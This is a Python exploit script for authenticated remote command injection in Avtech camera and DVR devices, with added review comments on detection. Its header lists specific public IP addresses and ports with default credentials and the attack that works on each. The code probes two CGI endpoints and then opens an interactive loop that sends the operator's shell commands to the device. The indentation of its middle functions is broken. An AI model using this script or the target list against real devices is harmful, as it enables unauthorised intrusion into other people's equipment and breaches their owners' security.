#!/usr/bin/python
# -*- coding: utf-8 -*-
#http://91.185.152.64:8080 admin:admin | adcommand command injection & cloud command #injection
#http://2.182.237.138 admin:1234 | Brute Force
#http://93.197.42.48:88 admin:admin | cloud command injection
#http://183.88.176.217:2375 admin:admin | Adcommand & cloud command injection
#http://171.96.204.181:9002 admin:admin | Brute Force
#http://183.89.46.157:8834 admin:admin | Brute Force
#http://180.183.81.30:7657 admin:admin | Brute Force
#http://119.76.8.203:81 admin:admin | adcommand command injection
#http://183.89.46.157:8001 admin:admin | Brute Force
#http://73.14.108.80:88 admin:admin | Brute Force
#http://58.11.226.8:8800 admin:admin | adcommand command injection
import os
import requests as req
import random
import re
def ban():
    """Print the script banner.

    The banner lists the title, author credit, vendor URL, contact address,
    test platform, the default credentials the script relies on, and the
    public reference it is based on.
    """
    banner_lines = (
        "######################################################",
        "--> Title : Avtech Devices Remote Command Execution(Python)",
        "--> Credit : SajjadBnz",
        "--> Vendor : http://www.avtech.com.tw/",
        "--> My Email : blackwolf@post.com",
        "--> Tested On : Ubuntu 18.04.1 LTS",
        "--> Default User:Pass : admin:admin",
        "--> References : https://www.exploit-db.com/exploits/40500\n\n",
    )
    for banner_line in banner_lines:
        # A single parenthesised string prints the same text as the
        # Python 2 print statements used in the rest of this file.
        print(banner_line)
def clearing():
    """Clear the terminal and, on Windows, run the `color a` console command.

    Both commands are fixed strings selected by ``os.name``; no
    user-supplied text reaches ``os.system`` here.
    """
    on_windows = os.name == 'nt'
    clear_cmd = 'cls' if on_windows else 'clear'
    os.system(clear_cmd)
    # On non-Windows hosts the original passes an empty command string to
    # os.system; that call is kept so the behaviour stays the same.
    colour_cmd = 'color a' if on_windows else ''
    os.system(colour_cmd)
# main(): prompt for a device address, probe the two supervisor CGI endpoints
# with the hard-coded admin:admin Basic credentials, and hand over to
# exploit() when either probe is judged positive.
# NOTE(review): this listing has lost its indentation, so which statements sit
# inside the try / for / if blocks cannot be read from the text itself. The
# comments below describe individual statements, not the block structure.
# Defensive reading: every request built here goes to one of the two paths in
# `payload`, carries the fixed User-Agent in `head`, and authenticates as
# admin:admin. Those three properties are what to look for in web or proxy logs.
def main():
global ip,port,payload,head
# Index 0 is requested with GET and takes its argument in the `exefile` query
# parameter; index 1 is requested with POST (see the req.get / req.post calls).
payload = ["/cgi-bin/supervisor/CloudSetup.cgi?exefile=","/cgi-bin/supervisor/adcommand.cgi"]
# Hard-coded browser User-Agent sent with the endpoint probes and commands.
head = {"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0"}
try:
global flag,exp,exp1
# flag records whether the first endpoint has been probed. exp and exp1 start
# as '' and are set to 0 and 1 when the matching endpoint is judged positive.
flag = 0
exp = ''
exp1 = ''
# Operator-supplied host and port, concatenated into URLs without validation.
ip = raw_input('[*] IP Address : ')
port = raw_input('[*] Port : ')
testCon = "http://"+ip+":"+port
print "[!] Checking Connection ..."
r = req.get(testCon,timeout=20)
# NOTE(review): req.codes.ok is the library constant 200, not r.status_code,
# so the comparison below does not reflect what the device answered.
pr = req.codes.ok
if pr == 200:
print "[+]",pr,"ok"
else:
print "-",pr," GoodBye!"
# A requests error or Ctrl+C ends the script.
except req.exceptions.RequestException as e:
print "[Network Error]\n\n",e
raise SystemExit
except KeyboardInterrupt:
print "\n\n[+] Ctrl+c Detected ! ¯\_(ツ)_/¯\n[-] GoodBye!\n"
raise SystemExit
# One probe per endpoint. `flag` sends the first pass to the GET probe and the
# next pass to the POST probe (presumably; this depends on the lost nesting).
for x in payload:
shell = "http://"+ip+":"+port+x
if flag == 0:
flag = 1
r = req.get(shell,headers=head,auth=('admin', 'admin'),timeout=20)
content = r.text
# The verdict is a substring search of the response body: any occurrence of
# '-3', '-35', '401', '-9', '403' or 'File not found' means "not vulnerable".
# The '-35' test is redundant, because '-3' already matches that text.
# NOTE(review): matching short substrings anywhere in the body makes both
# verdicts unreliable. Do not treat this output as proof that a device is or
# is not affected.
if (re.findall('-3',content) or re.findall('-35',content) or re.findall('401',content) or re.findall('-9',content) or re.findall('403',content) or re.findall('File not found',content)):
print "\n[-] CloudSetup.cgi Not vulnerable !"
else:
print "\n[+] Vulnerable !"
print "[+] Authenticated command injection in CloudSetup.cgi\n"
exp = 0
else:
# Probe body with an empty strCmd value. A POST to adcommand.cgi whose body
# starts with this literal prefix is a usable log or IDS signature.
pos = 'DoShellCmd "strCmd=&"'
r1 = req.post(shell,headers=head,auth=('admin', 'admin'),data=pos,timeout=20)
content = r1.text
# Same substring-based verdict as for the first endpoint, with the same caveat.
if (re.findall('-3',content) or re.findall('-35',content) or re.findall('401',content) or re.findall('-9',content) or re.findall('403',content) or re.findall('File not found',content)):
print "[-] adcommand.cgi Not vulnerable !\n"
else:
print "\n[+] adcommand.cgi Vulnerable !"
print "[+] Authenticated command injection in adcommand.cgi\n"
exp1 = 1
# Endpoint selection: when both probes were positive, exp1 is reset to 0 so
# that exploit() takes its CloudSetup.cgi branch. With no positive probe the
# script exits.
if exp1 == 1 and exp == 0:
print "\n[+] Vulnerabilites : "
print "[+] Authenticated command injection in CloudSetup.cgi"
print "[+] Authenticated command injection in adcommand.cgi\n"
exp1 = 0
print "[+] Using CloudSetup.cgi\n"
exploit()
elif exp == 0:
print "[+] Using CloudSetup.cgi\n"
exploit()
elif exp1 == 1:
print "[+] Using Adcommand.cgi\n"
exploit()
else:
raise SystemExit
# exploit(): interactive loop that forwards each line typed by the operator to
# the device through the endpoint main() selected, then prints the HTTP
# response body. It reads the module globals set by main(): ip, port, payload,
# head, exp and exp1.
# NOTE(review): this listing has lost its indentation, so the nesting of the
# statements below cannot be read from the text itself.
# Defensive reading: each command is a single HTTP request authenticated as
# admin:admin. It is either a POST to adcommand.cgi whose body starts with
# `DoShellCmd "strCmd=`, or a GET to CloudSetup.cgi with the command in the
# `exefile` query parameter, so activity from this script is visible in access
# logs. The credentials are hard-coded in every request; as written, the
# script cannot authenticate once the default admin password has been changed.
# Keeping the device's web interface off untrusted networks and applying
# vendor firmware updates are the other mitigations to check.
def exploit():
# NOTE(review): the "root" wording and the prompt below are cosmetic; nothing
# here checks which account the device runs the request as.
print "[+] got root? :) - use 'exit' to exit"
print "-------------------------------------"
try:
while True:
c1 = raw_input('root@AvTech: ')
if c1 == "exit" or c1 == "Exit":
print "\n[+] ¯\_(ツ)_/¯ Have a nice day !\n"
raise SystemExit
if exp1 == 1:
# POST branch: the typed text is interpolated into the body without encoding.
pos = 'DoShellCmd "strCmd=%s&"' % c1
shell = "http://"+ip+":"+port+payload[exp1]
r = req.post(shell,headers=head,auth=('admin', 'admin'),data=pos,timeout=20)
print r.text
else:
# GET branch: the typed text is appended to the `exefile=` URL without encoding.
shell = "http://"+ip+":"+port+payload[exp]+c1
r = req.get(shell,headers=head,auth=('admin', 'admin'),timeout=20)
print r.text
# Ctrl+C ends the session cleanly.
except KeyboardInterrupt:
print "\n\n[+] Ctrl+c Detected ! ¯\_(ツ)_/¯\n[-] Good Bye!\n"
raise SystemExit
if __name__ == '__main__':
    # Entry point: clear the screen, print the banner, then start the
    # interactive flow, in that order.
    for step in (clearing, ban, main):
        step()